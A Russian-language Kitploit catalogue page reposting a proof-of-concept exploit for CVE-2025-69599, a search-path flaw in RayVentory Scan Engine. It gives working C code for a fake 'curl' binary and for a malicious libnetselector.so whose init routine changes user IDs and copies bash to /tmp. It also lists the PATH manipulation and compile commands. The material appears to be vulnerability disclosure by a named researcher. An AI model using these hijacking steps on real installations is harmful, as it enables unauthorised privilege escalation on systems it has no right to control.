Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-69599 — Эксплойт доказательства концепции для CVE-2025-69599, демонстрирующий неконтролируемый элемент пути поиска в RayVentory Scan Engine через перехват PATH и внедрение разделяемых объектов для повышения привилегий. | Kitploit
Инструменты/GitHubGitHub/wise-security/cve-2025-69599
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеАнализ Бинарных ФайловБезопасность Цепочки Поставок
GitHubwise-security/cve-2025-69599

CVE-2025-69599

Эксплойт доказательства концепции для CVE-2025-69599, демонстрирующий неконтролируемый элемент пути поиска в RayVentory Scan Engine через перехват PATH и внедрение разделяемых объектов для повышения привилегий.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
4 месяцев назадЕщё не проверено

CVE-2025-69599

  • автор: Rafael José Núñez Gulías
  • компания: Iberian Var Group
  • Затронутые продукты: RayVentory Scan Engine 12.6 Update 8 и предыдущие версии
  • Уведомление Raynet: RSEC200965

rvia в Raynet подвержен проблеме неконтролируемого элемента пути поиска. При загрузке совместно используемых объектов и вызове системных двоичных файлов (таких как .so и вспомогательные двоичные файлы) они вызываются с использованием относительных путей, что позволяет пользователю подменить конечный двоичный файл или объект .so, используемый через манипуляцию переменной окружения PATH.

20251117223200.png

В следующем доказательстве создается произвольный двоичный файл с именем curl в каталоге /tmp.

root@kitploit:~
#include <stdio.h>
#include <stdlib.h>

int main() {
	system("whoami");
	return 0;
}
root@kitploit:~
gcc curl.c -o curl # Compiling the binary

Переменная PATH изменяется так, чтобы первым каталогом для поиска команды curl при вызове rvia был /tmp.

root@kitploit:~
export PATH=/tmp:$PATH

И после этого вызов /opt/rvia/rvia getconfig будет использовать наш подмененный двоичный файл curl.

20251209121335.png

То же самое относится и к опции upload.

20251209121709.png

Та же проблема обнаруживается при использовании опции rvia inventory, которая внутри вызывает двоичный файл ndtrack. Двоичный файл ndtrack вызывает команды cat и sh, используя относительный путь.

20251117223833.png

20251224134109.png

Наконец, также было обнаружено, что двоичный файл ndtrack включает совместно используемые объекты (файлы .so) с использованием относительных путей.

20251118093146.png

В следующем доказательстве можно увидеть шаги, предпринятые для замены относительного вызова libnetselector.so (также можно выполнить те же действия с libuploader.so). В этом случае создается пользовательский совместно используемый объект, при выполнении которого будет создана копия bash в каталоге /tmp с именем bash_so_hijack.

Ниже приведен код на C для создания пользовательского совместно используемого объекта с именем libnetselector.so

root@kitploit:~
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>

void _init() {
	setuid(1001);
	setgid(1001);
	system("cp /bin/bash /tmp/bash_so_hijack");
}
root@kitploit:~
gcc -fPIC -shared -o libnetselector.so libnetselector.c -nostartfiles # compiling the shared object

20251209131403.png

Важно отметить, что это работает только при прямом вызове ndtrack, поскольку при вызове опции inventory происходит вызов bash-скрипта по адресу /opt/rvia с именем ndtrack, который устанавливает переменную окружения PATH перед вызовом двоичного файла ndtrack.

20251223190146.png

Скачать инструмент